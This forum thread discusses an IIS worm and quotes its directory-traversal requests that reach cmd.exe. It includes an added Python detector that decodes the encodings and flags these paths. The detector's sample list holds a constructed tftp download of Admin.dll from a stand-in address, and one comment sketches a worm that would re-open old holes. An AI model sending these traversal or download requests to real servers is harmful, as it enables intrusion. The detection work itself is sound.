New (More) Annoying Microsoft Worm Hits Net
Here are examples of the requests it's sending:
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
While writing this story I was hit a total of 4 times, 16 GET attempts per attack, in only 4 minutes. Also of interest, my desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)
Update: Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!
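The request lines above only look like noise until they are decoded the way IIS decoded them. The following is an added example, not code from the original post: it canonicalizes request paths by mimicking two IIS decoder quirks (percent-decoding the path twice, so %255c becomes %5c and then "\", and a lax two-byte UTF-8 decoder that accepts overlong forms such as %c1%1c for "\" and %c0%af for "/" without checking the continuation byte), then flags paths that climb out of the web root or name cmd.exe/tftp/Admin.dll. The sample request list, the %c0%af variant, the tftp command line and the 192.0.2.1 address are constructed for the example; the targets list is an assumption based on the requests and the TFTP/ADMIN.DLL report quoted later in the thread.

```python
"""Canonicalize IIS-style request paths and flag traversal attempts.

Added example. The decoding rules below reproduce two documented IIS
behaviours of the time: the path was percent-decoded twice, and the
UTF-8 decoder accepted overlong two-byte sequences (and did not check
the continuation byte's 10xxxxxx prefix).
"""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: the three request lines from the post, one added
# %c0%af variant with a tftp download (192.0.2.1 is a documentation address),
# and one benign request.
SAMPLE_REQUESTS = [
    "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+192.0.2.1+GET+Admin.dll",
    "GET /index.html",
]

# Assumed indicator list for this example: binaries/files the requests go after.
TARGETS = ("cmd.exe", "tftp", "admin.dll")


def lax_utf8_decode(data: bytes) -> bytes:
    """Mimic the lax IIS UTF-8 decoder for two-byte sequences.

    A lead byte of 0xC0/0xC1 carries at most 7 payload bits, so the
    sequence is an overlong encoding of an ASCII byte. The continuation
    byte's prefix is deliberately not validated: 0x1c is not a legal
    continuation byte, yet %c1%1c was accepted as '\\'.
    """
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def canonicalize(path: str) -> str:
    """Decode a request path the way the vulnerable server did."""
    raw = unquote_to_bytes(path)   # pass 1: %255c -> %5c, %%35%63 -> %5c
    raw = unquote_to_bytes(raw)    # pass 2: %5c -> '\'  (the double-decode bug)
    raw = lax_utf8_decode(raw)     # %c1%1c -> '\', %c0%af -> '/'
    return raw.decode("latin-1").replace("\\", "/").lower()


def escapes_webroot(canon: str) -> bool:
    """True if '..' segments climb above the directory the path started in."""
    depth = 0
    for seg in canon.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if depth == 0:
                return True
            depth -= 1
        else:
            depth += 1
    return False


def classify(request_line: str) -> dict:
    """Parse one request line and report whether it looks like the worm's probes."""
    method, target = request_line.split()[:2]
    path, _, query = target.partition("?")
    canon = canonicalize(path)
    query_text = unquote_to_bytes(query).decode("latin-1").replace("+", " ").lower()
    hits = [t for t in TARGETS if t in canon or t in query_text]
    escape = escapes_webroot(canon)
    return {
        "method": method,
        "canonical": canon,
        "escapes_webroot": escape,
        "targets": hits,
        "suspicious": escape or bool(hits),
    }


def scan(lines):
    return [classify(line) for line in lines]


if __name__ == "__main__":
    for r in scan(SAMPLE_REQUESTS):
        flag = "ALERT" if r["suspicious"] else "ok   "
        print(f"{flag} {r['canonical']}  escape={r['escapes_webroot']} targets={r['targets']}")
```

Run against the post's own lines, every one of them decodes to /scripts (or /msadc, /_vti_bin) followed by enough "../" to leave the web root and reach winnt/system32/cmd.exe; the benign request is left alone. The point of decoding before matching is that a filter looking for the literal string "cmd.exe" or "../" in the raw request misses "%%35%63" and "%c1%1c" entirely.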
If it's scanning subnets, this could very well explain why I can't reach my machine at home (Roadrunner).
It's probably generating a sh*tload of traffic.
Can anyone on 24.x.x.x verify?
Arse? When did you move to England (or Ireland), Rob?
Microsoft has cost ISPs, businesses, and end users an incalculable amount of money and frustration and it is all due to their negligence. They were negligent when they created software and technologies that are so easily exploited. They were negligent in their testing of their products. They were negligent in not sending patch CDs through the mail to registered users. If they can send you upgrade offers via the mail, they can send you patch CDs to repair their defective products.
And before anyone starts quoting the Microsoft license, ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too. They have no license with Microsoft and they've been injured by Microsoft's negligence.
I'd like to see AOL, Earthlink, or some other big ISP take Microsoft's corporate butt to court, demanding compensatory and punitive damages for Microsoft's negligence.
I have a better solution
get 2 floppies
make freebsd kernel & mfsroot disks from www.freebsd.org
reboot your machine
install freebsd
simple, no more lame attacks from IIS machines
There are places where the networks are not touching, and there are places where they are. -Boeing's Lori Gunter
> One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box.
> Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the
Ehrm, won't that take care of itself if you just leave your machine on the network for a while?
Sheesh, evil *and* a jerk. -- Jade
> It's something new attacking something old. It looks to me like it's trying a few of the old IIS vulnerabilities...
Suppose someone wrote a worm that, whenever it managed to root a box, would undo the patches that finally killed off the famous worms of the past, and also remove the anti-virus software's data files.
Since many of those worms/viruses are still lurking about at the level of background noise, they would suddenly find a vastly expanded niche and start attacking machines that had formerly been off limits to them.
You could get a huge pile-up of worms and viruses all "re-released" simultaneously.
Sheesh, evil *and* a jerk. -- Jade
Well, what kind of a friend do you have?